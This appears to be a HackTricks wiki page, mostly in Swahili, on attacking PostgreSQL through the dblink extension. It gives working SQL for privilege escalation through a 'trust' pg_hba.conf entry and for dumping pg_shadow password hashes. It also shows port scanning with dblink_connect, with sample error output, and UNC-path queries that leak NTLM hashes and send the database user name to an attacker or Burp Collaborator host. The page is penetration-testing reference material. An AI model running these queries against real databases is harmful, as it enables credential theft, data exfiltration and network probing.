Network - Privesc, Port Scanner and NTLM chanllenge response disclosure

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Pata maelezo zaidi kuhusu mashambulizi haya katika karatasi asilia.

Tangu PostgreSQL 9.1, ufungaji wa moduli za ziada ni rahisi. Marekebisho yaliyoandikishwa kama dblink yanaweza kufungwa kwa kutumia CREATE EXTENSION:

CREATE EXTENSION dblink;

Once you have dblink loaded you could be able to perform some interesting tricks:

Privilege Escalation

Faili pg_hba.conf inaweza kuwa imewekwa vibaya ikikubali muunganisho kutoka localhost kama mtumiaji yeyote bila kuhitaji kujua nenosiri. Faili hii inaweza kupatikana kawaida katika /etc/postgresql/12/main/pg_hba.conf na usanidi mbaya unaonekana kama:

local    all    all    trust

Nakili kwamba usanidi huu unatumika mara nyingi kubadilisha nenosiri la mtumiaji wa db wakati msimamizi analisahau, hivyo wakati mwingine unaweza kuliona. Nakili pia kwamba faili pg_hba.conf inaweza kusomwa tu na mtumiaji na kikundi cha postgres na inaweza kuandikwa tu na mtumiaji wa postgres.

Kesi hii ni faida ikiwa tayari una shell ndani ya mwathirika kwani itakuruhusu kuungana na hifadhidata ya postgresql.

Makosa mengine yanayoweza kutokea ni kama ifuatavyo:

host    all     all     127.0.0.1/32    trust

Kwa sababu itaruhusu kila mtu kutoka kwenye localhost kuungana na hifadhidata kama mtumiaji yeyote. Katika kesi hii na ikiwa kazi ya dblink inafanya kazi, unaweza kuinua mamlaka kwa kuungana na hifadhidata kupitia muunganisho ulioanzishwa tayari na kufikia data ambayo haupaswi kuwa na uwezo wa kufikia:

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'SELECT datname FROM pg_database')
RETURNS (result TEXT);

SELECT * FROM dblink('host=127.0.0.1
user=postgres
dbname=postgres',
'select usename, passwd from pg_shadow')
RETURNS (result1 TEXT, result2 TEXT);

Port Scanning

Kwa kutumia dblink_connect unaweza pia kutafuta port zilizo wazi. Ikiwa hiyo **kazi haifanyi kazi unapaswa kujaribu kutumia dblink_connect_u() kama hati inavyosema kwamba dblink_connect_u() ni sawa na dblink_connect(), isipokuwa itaruhusu watumiaji wasiokuwa wasimamizi kuungana kwa kutumia njia yoyote ya uthibitishaji_.

SELECT * FROM dblink_connect('host=216.58.212.238
port=443
user=name
password=secret
dbname=abc
connect_timeout=10');
//Different response
// Port closed
RROR:  could not establish connection
DETAIL:  could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 4444?

// Port Filtered/Timeout
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTP server
ERROR:  could not establish connection
DETAIL:  timeout expired

// Accessing HTTPS server
ERROR:  could not establish connection
DETAIL:  received invalid response to SSL negotiation:

Kumbuka kwamba kabla ya kuwa na uwezo wa kutumia dblink_connect au dblink_connect_u unaweza kuhitaji kutekeleza:

CREATE extension dblink;

UNC njia - NTLM hash kufichuliwa

-- can be used to leak hashes to Responder/equivalent
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';

-- to extract the value of user and send it to Burp Collaborator
CREATE TABLE test(retval text);
CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
SELECT INTO userval (SELECT user);
sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT testfunc();

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousPL/pgSQL Password Bruteforce NextBig Binary Files Upload (PostgreSQL)

Last updated 4 months ago

SELECT * FROM dblink('host=127.0.0.1 user=postgres dbname=postgres', 'SELECT datname FROM pg_database') RETURNS (result TEXT); SELECT * FROM dblink('host=127.0.0.1 user=postgres dbname=postgres', 'select usename, passwd from pg_shadow') RETURNS (result1 TEXT, result2 TEXT);

SELECT * FROM dblink_connect('host=216.58.212.238 port=443 user=name password=secret dbname=abc connect_timeout=10'); //Different response // Port closed RROR: could not establish connection DETAIL: could not connect to server: Connection refused Is the server running on host "127.0.0.1" and accepting TCP/IP connections on port 4444? // Port Filtered/Timeout ERROR: could not establish connection DETAIL: timeout expired // Accessing HTTP server ERROR: could not establish connection DETAIL: timeout expired // Accessing HTTPS server ERROR: could not establish connection DETAIL: received invalid response to SSL negotiation:

-- to extract the value of user and send it to Burp Collaborator CREATE TABLE test(retval text); CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$ DECLARE sqlstring TEXT; DECLARE userval TEXT; BEGIN SELECT INTO userval (SELECT user); sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\''; EXECUTE sqlstring; END; $$ LANGUAGE plpgsql SECURITY DEFINER; SELECT testfunc();